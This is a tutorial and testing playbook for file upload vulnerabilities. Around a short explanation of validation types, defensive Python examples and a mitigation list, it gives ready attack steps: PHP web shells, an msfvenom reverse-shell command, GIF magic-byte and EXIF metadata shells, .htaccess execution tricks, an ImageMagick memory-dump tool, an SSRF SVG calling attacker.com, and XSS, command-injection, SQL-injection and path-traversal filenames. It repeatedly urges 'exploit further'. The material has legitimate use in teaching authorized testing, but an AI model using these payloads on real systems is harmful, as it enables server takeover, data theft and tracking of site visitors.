File upload vulnerabilities are a noteworthy issue in web applications. If a web application has this type of vulnerability, an attacker can upload a file containing malicious code that is then executed on the server. An attacker may also be able to place a phishing page on the site, or deface it to expose internal data of the web server to other people.
Allowing file uploads by end users, especially when done without a full understanding of the associated risks, is akin to opening the floodgates for server compromise. Despite the security concerns around letting end users upload files, it is an increasingly common requirement in modern web applications.
File uploads carry a significant risk that not many are aware of, or know how to mitigate. Worse still, several web applications contain insecure, unrestricted file upload mechanisms.
Make sure you read the first link in the References (it's a great blog), then proceed further.
What each extension can lead to if it is uploaded successfully:

| Extensions | Impact |
| --- | --- |
| ASP, ASPX, PHP5, PHP, PHP3 | Webshell, RCE |
| SVG | Stored XSS, SSRF, XXE |
| GIF | Stored XSS, SSRF |
| CSV | CSV injection |
| XML | XXE |
| AVI | LFI, SSRF |
| HTML, JS | HTML injection, XSS, Open redirect |
| PNG, JPEG | Pixel flood attack (DoS) |
| ZIP | RCE via LFI, DoS |
| PDF, PPTX | SSRF, Blind XXE |
| SCF | RCE |
Types of Validation in File-Upload:
There are several others too, but these are the main five types. Others, such as file signature validation, file content validation and file storage location checks, fall under further protection.
1. Client-Side Validation:
Client-side validation is validation that takes place before the input is actually sent to the server. It happens in the web browser, implemented with JavaScript, VBScript or HTML5 attributes. Programmers use this type of validation to provide a better user experience by responding quickly at the browser level.
For example: an error message such as "Only .jpg is allowed" shown in the browser.
2. File Name Validation:
File name validation is when the server validates the file being uploaded by checking its extension. This validation can be done in many ways, but the two most popular methods are blacklisting file extensions and whitelisting file extensions.
Blacklisting file extensions is a type of protection where only specific extensions are rejected by the server, such as php and aspx. Whitelisting file extensions is the exact opposite: only a few file extensions are allowed to be uploaded to the server, such as jpg, jpeg and gif.
3. Content-type / MIME-type Validation:
Content-Type validation is when the server validates the file by checking the MIME type declared for it, which is visible in the HTTP request. For example, some image uploads validate the uploaded image by checking whether the Content-Type of the file is an image type.
For example: `Content-Type: image/png`
4. Content-Length Validation:
Content-Length validation is when the server checks the length of the uploaded file's content and enforces a file size that can't be exceeded. Although this type of validation is not very popular, it can be seen on some file uploads.
For example: do not allow a file size greater than 10 bytes.
5. Checking the Image Header:
When only image uploads are allowed, most web applications validate the image header using a server-side function such as getimagesize() in PHP. When called, this function returns an array describing the image's dimensions and type. If the file is not a valid image, meaning the file header is not that of an image, the function returns FALSE. Therefore, several web applications simply check whether the function returns TRUE or FALSE and validate the uploaded file using this information.
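As an added example (not code from the original post), the following Python routine separates the three claims an upload makes, its extension, its Content-Type header and its actual bytes, so that only the bytes decide. It shows why the extension and Content-Type checks above verify nothing on their own, and why a header check like getimagesize() still passes an image-prefixed file with script inside. The signature table, marker list and sample files are constructed for the demo.

```python
# Added example, not the original post's code: inspect an upload by its bytes.
# Signature table, marker list and sample inputs are constructed for the demo.

IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\xff\xd8\xff": "image/jpeg",
}
EXTENSION_TYPES = {"png": "image/png", "gif": "image/gif",
                   "jpg": "image/jpeg", "jpeg": "image/jpeg"}
# Byte strings that never belong in an image body or its metadata.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%", b"#!")


def sniff_image_type(data):
    """Return the MIME type implied by the file's magic bytes, or None."""
    for magic, mime in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return mime
    return None


def inspect_upload(filename, declared_type, data):
    """Return reasons to reject the upload; an empty list means it is consistent."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    real_type = sniff_image_type(data)
    if real_type is None:
        findings.append("no known image signature in file header")
    # Extension and Content-Type header are client claims; compare both to the bytes.
    if EXTENSION_TYPES.get(ext) != real_type:
        findings.append(f"extension .{ext} does not match file bytes ({real_type})")
    if declared_type != real_type:
        findings.append(f"Content-Type header {declared_type} does not match file bytes ({real_type})")
    # A valid header does not prove a valid image: scan the whole body for script markers.
    lowered = data.lower()
    for marker in SCRIPT_MARKERS:
        if marker in lowered:
            findings.append(f"script marker {marker!r} embedded in file body")
    return findings


# Constructed samples: a minimal PNG header, and the GIF89a-prefixed shape from the text.
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
POLYGLOT_GIF = b"GIF89a; <?php echo 'hello'; ?>"

if __name__ == "__main__":
    print(inspect_upload("photo.png", "image/png", CLEAN_PNG))
    print(inspect_upload("dapos.php", "image/gif", POLYGLOT_GIF))
```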
Testing Methodology:

1. Browse the site and find each upload functionality.
2. Start with a basic test by simply uploading a web shell using Weevely: `weevely generate <password> <path>`, or use msfvenom: `msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.8 lport=4444 -f raw`
3. Try the extension bypasses if that fails.
4. Try changing the content-type to bypass.
5. Try the magic number bypass.
6. Try the polyglot or PNG IDAT chunks bypass.
7. Finally, if successful, upload a small POC or exploit further.
Test Case - 1: Blacklisting Bypass.
1. Find the upload request and send it to the repeater.
2. Now start testing which extensions are blacklisted by changing the `filename=` parameter:

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   [...]
   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: application/x-php
   ```

3. Try all of these extensions:
   - **PHP** → .phtm, .phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
   - **ASP** → .asp, .aspx, .cer, .asa
   - **JSP** → .jsp, .jspx, .jsw, .jsv, .jspf
   - **ColdFusion** → .cfm, .cfml, .cfc, .dbm
   - **Using random capitalization** → .pHp, .pHP5, .PhAr

   Find more in PayloadsAllTheThings and https://book.hacktricks.xyz/pentesting-web/file-upload
4. If successful, exploit further; otherwise there might be another type of validation or check, so try other bypasses.
Test Case - 2: Whitelisting Bypass
1. Find the upload request and send it to the repeater.
2. Now start testing which extensions are whitelisted by changing the `filename=` parameter:

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   [...]
   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.jpg"
   Content-Type: application/x-php
   ```

3. Try all of these extensions:

   ```
   file.jpg.php
   file.php.jpg
   file.php.blah123jpg
   file.php%00.jpg
   file.php\x00.jpg
   file.php%00
   file.php%20
   file.php%0d%0a.jpg
   file.php.....
   file.php/
   file.php.\
   file.php#.png
   file..html
   ```

   The `file.php\x00.jpg` case can also be done while uploading the file: name it `file.phpD.jpg` and change the D (0x44) in hex to 00.
4. If that doesn't work, try brute-forcing with Intruder to find which extensions are accepted, then try again.
5. If successful, exploit further; otherwise there might be another type of validation or check, so try other bypasses.
Test Case - 3: Content-type validation
1. Find the upload request and send it to the repeater.
2. Upload file.php and change `Content-Type: application/x-php` or `Content-Type: application/octet-stream` to `Content-Type: image/png`, `Content-Type: image/gif` or `Content-Type: image/jpg`:

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   [...]
   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: application/x-php
   ```

3. If successful, exploit further; otherwise there might be another type of validation or check, so try other bypasses.
Test Case - 4: Content-Length validation
1. Find the upload request and send it to the repeater.
2. Try all three of the above bypasses first; if they don't work, check whether the file size is being checked. Try all four of these cases in combination for a higher success rate.

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   [...]
   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: application/x-php
   [...]
   ```

3. Try a small file payload such as:

   ```php
   <?=`$_GET[x]`?>
   <?=`ls`;
   ```

   Note: `<?` works when `short_open_tag=On` in php.ini (default is On).
4. Finally, the request should look like this:

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   [...]
   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: application/x-php

   <?=`$_GET[x]`?>
   ```

   If this worked, try to access the file, for example: http://example.com/compromised_file.php?x=cat%20%2Fetc%2Fpasswd
5. Don't stop here; upload a better shell and try to see if you can find something more critical, like DB_.
Test Case - 5: Content Bypass / Using Magic Bytes
1. Find the upload request and send it to the repeater.
2. Try all four of the above bypasses first; if they don't work, check whether the file content is being checked. Try all five of these cases in combination for a higher success rate.

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   [...]
   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: application/x-php
   [...]
   ```

3. Change `Content-Type: application/x-php` to `Content-Type: image/gif` and add the text `GIF89a;` before your shell code:

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   [...]
   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: image/gif

   GIF89a; <?php system($_GET['cmd']); ?>
   ```

4. Try more signatures from https://en.wikipedia.org/wiki/List_of_file_signatures and change the Content-Type accordingly.
5. If successful, upload a better shell and POC, and see how you can increase the criticality.
Test Case - 6: Magic Bytes and Metadata Shell
1. Find the upload request and send it to the repeater.
2. Try all of the above bypasses first; if they don't work, check whether the file content is being checked. Try all six of these cases in combination for a higher success rate.

   ```http
   POST /images/upload/ HTTP/1.1
   Host: target.com
   [...]
   ---------------------------829348923824
   Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
   Content-Type: application/x-php
   [...]
   ```

3. First bypass the Content-Type checks by setting the value of the Content-Type header to `image/png`, `text/plain` or `application/octet-stream`.
4. Introduce the shell inside the metadata using exiftool:

   ```shell
   exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
   ```

5. Now try uploading this modified img.jpg.
6. Exploit further to increase the criticality.
Test Case - 7: Uploading Configuration Files
1. Find the upload request and send it to the repeater.
2. Now try to upload a .htaccess file if the app is using a PHP server, or else try to upload a .config file if the app is using an ASP server.
3. If you can upload a .htaccess, then you can configure several things and even execute code (for example, configuring that files with the extension .htaccess can be executed). Different .htaccess shells can be found here: https://github.com/wireghoul/htshells. Or, if you can upload .config files, use them to execute code; one way to do it is appending the code at the end of the file inside an HTML comment: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config

   More information and techniques to exploit this vulnerability here: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
4. Now that the server config is changed, upload the shell. For example, if you uploaded a .htaccess file containing `AddType application/x-httpd-php .png`, this configuration would instruct the Apache HTTP Server to execute PNG images as though they were PHP scripts.
5. Now simply upload our PHP shell file with the extension .png.
6. Done; try to exploit further.
Test Case - 8: Try Zip Slip Upload
1. Find the upload request and send it to the repeater.
2. Now check whether a .zip file is allowed to be uploaded.
3. If the site accepts .zip files, create a .php file, compress it into a .zip and upload it.
4. Now visit `site.com/path?page=zip://path/file.zip%23rce.php`

   You can also try the tool and info here: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Zip%20Slip
Test Case - 9: Try ImageMagick
Check reference: https://hackerone.com/reports/302885 , https://medium.com/@kunal94/imagemagick-gif-coder-vulnerability-leads-to-memory-disclosure-hackerone-e9975a6a560e

1. Find the upload functionality, like a profile picture upload.
2. Git clone https://github.com/neex/gifoeb on your system.
3. Go to the gifoeb directory and run this command:

   ```shell
   ./gifoeb gen 512x512 dump.gif
   ```

   This will create an exploitable dump.gif file, where 512x512 is the pixel dimension and dump.gif is a GIF file. You can also try to bypass some checks:

   a) `./gifoeb gen 1123x987 dump.jpg`
   b) `./gifoeb gen 1123x987 dump.png`
   c) `./gifoeb gen 1123x987 dump.bmp`
   d) `./gifoeb gen 1123x987 dump.tiff`
   e) `./gifoeb gen 1123x987 dump.tif`

   (It will create the dump files with different extensions. Try whichever works on the site.)
4. After creating the exploitable files, just upload them in the profile settings using the modified image files.
5. The server will return different pixel files. Download these files.
6. Save and recover the pixel files:

   ```shell
   for p in previews/*; do ./gifoeb recover $p | strings; done
   ```

7. More details here: https://github.com/neex/gifoeb

Another different method:

Reference: https://www.exploit-db.com/exploits/39767 , https://hackerone.com/reports/135072

1. Find the upload functionality.
2. Make a file with the .mvg extension and add the code below to it:

   ```
   push graphic-context
   viewbox 0 0 640 480
   fill 'url(http://example.com/)'
   pop graphic-context
   ```

   Here example.com can be your Burp Collaborator URL or your own site where you can receive HTTP requests.
3. Now use the command `convert ssrf.mvg out.png`
4. Upload the image and see if you received an HTTP request.

Find ready-made and more payloads here: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Picture%20Image%20Magik
Exploitation:
XSS:
There are multiple ways to achieve XSS.

1. Set the file name: `filename="svg onload=alert(document.domain)>"` or `filename="58832_300x300.jpg<svg onload=confirm()>"`
2. Upload using a .gif file: `GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;`
3. Upload using a .svg file.

Using an Excel file you can achieve not only XXE but other vulnerabilities too: https://medium.com/@rezaduty/security-issues-in-import-export-functionality-5d8e4b4e9ed3
SSRF:

1. Abuse the "Upload from URL" feature: if this image is going to be saved on some public site, you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information about every visitor.
2. SSRF through a .svg file:

   ```xml
   <?xml version="1.0" encoding="UTF-8" standalone="no"?>
   <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg"
        xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
     <image height="200" width="200" xlink:href="https://attacker.com/picture.jpg" />
   </svg>
   ```
Command Injection:
1. Set the filename to `; sleep 10;`
LFI:
1. Set the filename to `../../etc/passwd/logo.png`
2. Set the filename to `../../../logo.png`, as it might change the website logo.
SQL Injection:
1. Set the filename to `'sleep(10).jpg`
2. Set the filename to `sleep(10)-- -.jpg`
DOS:
1. Pixel flood attack using an image: upload this image and boom!
   https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/malicious-images/lottapixel.jpg
   https://hackerone.com/reports/390#:~:text=By%20loading%20the%20'whole%20image,Photo%20Viewer%20on%20my%20computer.
2. DoS with a large value in the name: `1234...99.png`
SSTI:
Mitigation
File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:
- Use a server-generated filename if storing uploaded files on disk.
- Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
- Enforce a whitelist of accepted, non-executable file extensions.
- If uploaded files are downloaded by users, supply an accurate non-generic Content-Type header, the X-Content-Type-Options: nosniff header, and also a Content-Disposition header that specifies that browsers should handle the file as an attachment.
- Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration).
- Reject attempts to upload archive formats such as ZIP.
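As an added example (not the original post's code), the handler below applies the mitigation list above: the client's filename never reaches disk, only the final extension is checked against a whitelist, a size cap is enforced, and the download response carries the recommended headers. Inspecting the bytes of the file is a separate step not shown here. The extension table, size limit and function names are assumptions for the demo.

```python
# Added example, not the original post's code: an upload handler built from the
# mitigation list. Extension table, limit and function names are assumptions.
import os
import secrets

ALLOWED_EXTENSIONS = {"png": "image/png", "jpg": "image/jpeg",
                      "jpeg": "image/jpeg", "gif": "image/gif"}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024   # assumed limit; enforce it in the web server too


def validate_upload(client_name, data):
    """Return (True, extension) if acceptable, otherwise (False, reason)."""
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file exceeds size limit"
    # Drop any directory part the client sent (e.g. ../../etc/passwd/logo.png).
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    # Reject raw or percent-encoded null bytes (file.php%00.jpg style names).
    if "\x00" in base or "%00" in base.lower():
        return False, "null byte in filename"
    # Dotfiles such as .htaccess and names without an extension are refused.
    if "." not in base or base.startswith("."):
        return False, "missing extension"
    # Only the final extension counts; casing is normalised so .pHP5 is not special.
    ext = base.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    return True, ext


def server_filename(ext):
    """Random server-generated name: nothing from the client reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{ext}"


def store_upload(client_name, data, upload_dir):
    """Validate, then write under a generated name. Returns (stored_name, error)."""
    ok, result = validate_upload(client_name, data)
    if not ok:
        return None, result
    name = server_filename(result)
    with open(os.path.join(upload_dir, name), "wb") as fh:
        fh.write(data)
    return name, None


def download_headers(stored_name):
    """Response headers for serving a stored file back: exact type, no sniffing, attachment."""
    ext = stored_name.rsplit(".", 1)[-1]
    return {
        "Content-Type": ALLOWED_EXTENSIONS[ext],
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{stored_name}"',
    }
```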